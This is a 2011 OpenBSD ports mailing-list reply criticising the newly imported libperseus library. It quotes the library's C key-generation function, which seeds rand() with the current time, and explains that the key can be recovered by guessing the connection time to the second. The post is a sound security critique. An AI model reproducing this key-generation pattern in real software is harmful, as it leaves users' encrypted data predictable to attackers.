On Wed, Mar 30, 2011 at 01:29:02PM +0200, Pierre-Emmanuel André wrote:
> On Wed, Mar 30, 2011 at 11:42:23AM +0200, viq wrote:
> > On Tue, Mar 29, 2011 at 06:14:21AM -0600, Pierre-Emmanuel Andre wrote:
> > > CVSROOT: /cvs
> > > Module name: ports
> > > Changes by: p...@cvs.openbsd.org 2011/03/29 06:14:21
> > >
> > > Log message:
> > > Import libperseus.
> > >
> > > PERSEUS library is an open source technology whose aim is to secure
> > > any
> > > kind of communication streams against illegitimate or abusive
> > > eavesdropping except for Nation State Security offices, provided that
> > > a
> > > suitable, huge computing power is used (from tens of hours with a
> > > supercomputer).
> >
> > "PERSEUS library is an open source technology whose aim is to secure
> > any kind of communication streams against illegitimate or abusive
> > eavesdropping except for Nation State Security offices, provided that a
> > suitable, huge computing power is used (from tens of hours with a
> > supercomputer). PERSEUS enables to provide at the same time users' needs
> > for privacy and confidentiality while preserving the ability of security
> > agencies (police, defense, national security...) to eavesdrop
> > communications of really bad actors (terrorists, child pornographs...)."
> >
> > Huh? While preserving the ability of security agencies to eavesdrio
> > communications? Any information how that is actually done?
> >
> > Also, anything that uses/plans to use this?
>
> The purpose of perseus is not to "crypt" data but rather to "hide" them
> by adding noise (like this they doesn't look like encrypted).
> And indeed, you can "break" perseus but for this you will need to have
> a huge computing power (typically a supercomputer).
The security model is very odd, but I don't need to convince you of that
to show that this library is just bad.
As far as I can make out, the security is based on the high
computational cost of error-correcting a specific error-correcting code.
It uses a secret key to generate noise and adds this noise into the data
stream. The intended recipient (with the key) can just subtract the
noise, but any eavesdropper would have to perform the expensive
error-correcting procedure.
The difficulty of decoding these codes is not a standard cryptographic
assumption, but it appears to be a well-studied problem, so this is
"only" a red flag.
It also doesn't appear to authenticate data; you could probably mount a
timing attack; and it may have more "mundane" bugs like buffer
overflows. Those would be pretty serious issues, but they are not the
worst.
No, the real gem is the key generation. It calls srand(time(NULL)), and
then proceeds to use rand(). Seriously:
$ whatis srand
rand, srand (3) - bad random number generator
=== perseus.h ===
/* alea(): a random float in [0, 1] */
#define alea() (rand()/(RAND_MAX + 1.0))
=================
=== perseus.c ===
/***************************************************/
/* Noise generator generation procedure */
/***************************************************/
int Gen_Noise_Generator(NOISE_GEN * aNGen, INIT_NOISE_GEN * aKey)
{
unsigned char w, val;
time_t now;
now = time(NULL);
while(now == (time_t)(-1)) now = time(NULL);
srand(now);
/* Feedback polynomials initialization */
aNGen->L1 = POLY1;
aNGen->L2 = POLY2;
aNGen->L3 = POLY3;
aNGen->L4 = POLY4;
/* Noise probability generation ([0.15, 0.35])*/
aNGen->proba = 15 + (int)(20.0 * alea());
/* Feedback polynomial length initialization */
aNGen->L1 = LR1;
aNGen->L2 = LR2;
aNGen->L3 = LR3;
aNGen->L4 = LR4;
/* Boolean filtering function generation */
w = 0;
aNGen->Bf = (unsigned char *)calloc(16, sizeof(unsigned char));
for (w = 0; w < 16; w++)
{
val = (int)(99.0 * alea());
if(val < aNGen->proba) aNGen->Bf[w] = 1;
}
/* Noise generator key generation (102 bits) */
aKey->INIT1 = rand() & MASK1;
aKey->INIT2 = rand() & MASK2;
aKey->INIT3 = rand() & MASK3;
aKey->INIT4 = rand() & MASK4;
return(1);
}
=================
Why bother with a "difficult" attack if you only have to guess the time
of first connection *to the nearest second*?
Joachim
